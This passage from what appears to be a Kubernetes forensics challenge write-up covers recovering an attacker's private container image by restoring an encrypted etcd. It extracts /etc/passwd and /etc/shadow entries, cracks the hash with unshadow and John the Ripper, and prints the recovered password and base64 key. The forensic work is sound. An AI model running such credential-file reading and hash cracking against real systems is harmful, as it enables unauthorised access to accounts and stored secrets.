class=&#34;line&#34;&gt;42&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;43&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;### content deploy.yaml ###&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;update-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;update-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;update-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;strategy:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;update-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;imagePullSecrets:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;regcred&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;medrafk8s/kubersex&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;update-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;requests:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;memory:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;64Mi&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;cpu:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;250m&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;limits:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;memory:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;128Mi&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;cpu:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;500m&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;affinity:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;nodeAffinity:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;requiredDuringSchedulingIgnoredDuringExecution:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;attr&#34;&gt;nodeSelectorTerms:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;matchExpressions:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;app-type&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                      &lt;span class=&#34;attr&#34;&gt;operator:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;In&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                      &lt;span class=&#34;attr&#34;&gt;values:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;web-app&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;                      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;front-end&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;status:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This is a deployment manifest that pull a private image  &lt;code&gt;medrafk8s/kubersex&lt;/code&gt;  using the imagePullSecrets fields! The nodeAffinity is used for some scheduling specification. In this example the deployment will be deployed in node with labels  &lt;code&gt;app-type=web-app&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Let’s summerize now! The attacker installed Kind to deploy the web app that hosts the malicious inside a kubernetes cluster!&lt;/p&gt;
&lt;p&gt;So our objective is to recover the webapp that contains the malicious binary! But how can we restore that container! It’s a private container! What we should to do?&lt;/p&gt;
&lt;p&gt;To get the private container we need to get the pull secret. The credential that allow us to pull the container image! The credential are stored inside a  &lt;code&gt;secret&lt;/code&gt;  (Kubernetes Object).&lt;/p&gt;
&lt;p&gt;According to the bash history we have this commands:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;USER=XXXXXXXXXXXXXXXXXXXX&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;PASSWORD=XXXXXXXXXXXXXXXXXXX&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;SERVER=XXXXXXXXXXXXXXXXXX&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubectl create secret docker-registry regcred --docker-server=&lt;span class=&#34;variable&#34;&gt;$SERVER&lt;/span&gt; --docker-username=&lt;span class=&#34;variable&#34;&gt;$USER&lt;/span&gt; --docker-password=&lt;span class=&#34;variable&#34;&gt;$PASSWORD&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubectl get secrets&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;blockquote&gt;
&lt;p&gt;The attacker store the credential inside environement and create a pull secret using  &lt;code&gt;kubectl&lt;/code&gt;  command&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The only way to get the credential is to extract the secret from the  &lt;code&gt;etcd&lt;/code&gt; . But We have a problem! The etcd is protected!&lt;/p&gt;
&lt;p&gt;Let’s Back to the bash history you’ll find that the attacker edit a  &lt;code&gt;kube-apiserver.yaml&lt;/code&gt;  and  &lt;code&gt;enc.yaml&lt;/code&gt; .&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;comment&#34;&gt;### enc.yaml ###&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apiserver.config.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;EncryptionConfiguration&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;secrets&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;providers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;identity:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;secretbox:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;keys:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;key1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;secret:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;BASE64&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ENCODED&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Let’s talk a little about the  &lt;code&gt;Encryption Configuration&lt;/code&gt;  in Kubernetes.&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;./images/https://d33wubrfki0l68.cloudfront.net/2475489eaf20163ec0f54ddc1d92aa8d4c87c96b/e7c81/images/docs/components-of-kubernetes.svg&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;As known. Etcd is a distributed key-value store that is used by Kubernetes to store and retrieve the configuration data for the cluster. The Kubernetes API server interacts with etcd to read and write configuration data, such as the current state of the cluster and the desired state. The etcd data store serves as the single source of truth for the Kubernetes cluster’s configuration data, and the API server ensures that this data is always up to date and consistent across the cluster.&lt;/p&gt;
&lt;p&gt;The API server accepts an argument  &lt;code&gt;--encryption-provider-config&lt;/code&gt;  that controls how API data is encrypted in etcd. In other words, API server can store the data inside etcd but not in plain text! It’s encrypted to secure the data inside the database! for more details check this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvdGFza3MvYWRtaW5pc3Rlci1jbHVzdGVyL2VuY3J5cHQtZGF0YS8=&#34;&gt;link&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;So our mission now is to find the secret value of the  &lt;code&gt;EncryptionConfiguration&lt;/code&gt;  to use it after restoring the etcd by setting up a new api server that can read the encrypted data from the  &lt;code&gt;etcd&lt;/code&gt; .&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/XEB64Su.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Getting back to the whatsapp discussion. The attacker use the same password for the encryption key and subsystem password!&lt;/p&gt;
&lt;p&gt;Bingo!! Crack time! We know that the encryption key must be 32 bytes. So this information will help us filtering the downloaded wordlist!&lt;/p&gt;
&lt;p&gt;Linux stores user passwords hashes in  &lt;code&gt;/etc/shadow&lt;/code&gt; . Great, we have the hash and the wordlist! Let’s do it!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/SanopKU.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Let’s start filter out the passwords with 32 characters from the wordlist using grep and tail to pick from the bottom:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;grep -E &lt;span class=&#34;string&#34;&gt;&amp;#x27;^.&amp;#123;32&amp;#125;$&amp;#x27;&lt;/span&gt; passwords.txt | &lt;span class=&#34;built_in&#34;&gt;tail&lt;/span&gt; -n 100000 &amp;gt; pass.txt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to extract the user information from  &lt;code&gt;/etc/shadow&lt;/code&gt;  and  &lt;code&gt;/etc/password&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;grep kong etc/passwd &amp;gt; passwd.txt&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;grep kong etc/shadow &amp;gt; shadow.txt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Before start cracking using  &lt;code&gt;John The Ripper&lt;/code&gt; . We need to combine the passwd and shadow into a format that john can read.  &lt;code&gt;unshadow&lt;/code&gt;  can do this work!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;unshadow passwd.txt shadow.txt &amp;gt; crack-me.txt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now our hash is ready for crack. Let’s use john with  &lt;code&gt;--format=crypt&lt;/code&gt;  to specify that we are trying to crack yescrypt hash&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;john --wordlist=pass.txt crack-me.txt --format=crypt&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After some minutes we got the password!! The password is :  &lt;code&gt;@a*Hd~u32@q1Db/LUiOFxC*W2THm5p*V&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/c1mV0ef.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Now it’s time to resotre the  &lt;code&gt;etcd&lt;/code&gt; . Restoring a Kubernetes cluster in case of a disaster can be accomplished using etcd snapshots. However, the process of restoring an etcd snapshot is not straightforward and requires expertise. Actually in kubernetes etcd can take snapshot automatically. So we will count on that.&lt;/p&gt;
&lt;p&gt;In this case i will use Kind to generate a lightweight cluster. In case you will use your own cluster you must to know that restoring etcd can lead you to lost your cluster data. So be careful!&lt;/p&gt;
&lt;p&gt;To keep it simple I’ll use the same configuration as  &lt;code&gt;k-config.yaml&lt;/code&gt; .&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;kind create cluster --config=k-config.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Creating cluster &lt;span class=&#34;string&#34;&gt;&amp;quot;kind&amp;quot;&lt;/span&gt; ...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; ✓ Ensuring node image (kindest/node:v1.25.3) 🖼&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kubectl cluster-info --context kind-kind&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Have a &lt;span class=&#34;built_in&#34;&gt;nice&lt;/span&gt; day! 👋&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In Kind each node will be represented as a container&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ docker ps&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;CONTAINER ID   IMAGE                  COMMAND                  CREATED         STATUS         PORTS&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  NAMES&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;eba4afe51855   kindest/node:v1.25.3   &lt;span class=&#34;string&#34;&gt;&amp;quot;/usr/local/bin/entr…&amp;quot;&lt;/span&gt;   2 minutes ago   Up 2 minutes   127.0.0.1:43323-&amp;gt;6443/tcp   kind-control-plane&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13d7b697ba1f   kindest/node:v1.25.3   &lt;span class=&#34;string&#34;&gt;&amp;quot;/usr/local/bin/entr…&amp;quot;&lt;/span&gt;   2 minutes ago   Up 2 minutes   0.0.0.0:80-&amp;gt;30999/tcp       kind-worker&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After making sure that the api-server works correctly we need to add the  &lt;code&gt;Encryption Configuration&lt;/code&gt;  to make sure that the api server can read the encrypted data after restoring etcd.&lt;/p&gt;
&lt;p&gt;Go and put this file on  &lt;code&gt;/etc/kubernetes/enc/enc.yaml&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apiserver.config.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;EncryptionConfiguration&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;secrets&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;providers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;identity:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;secretbox:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;keys:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;key1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;secret:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;QGEqSGR+dTMyQHExRGIvTFVpT0Z4QypXMlRIbTVwKlY=&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Then go to  &lt;code&gt;/etc/kubernetes/manifests/api-server.yaml&lt;/code&gt;  to add these lines.&lt;/p&gt;
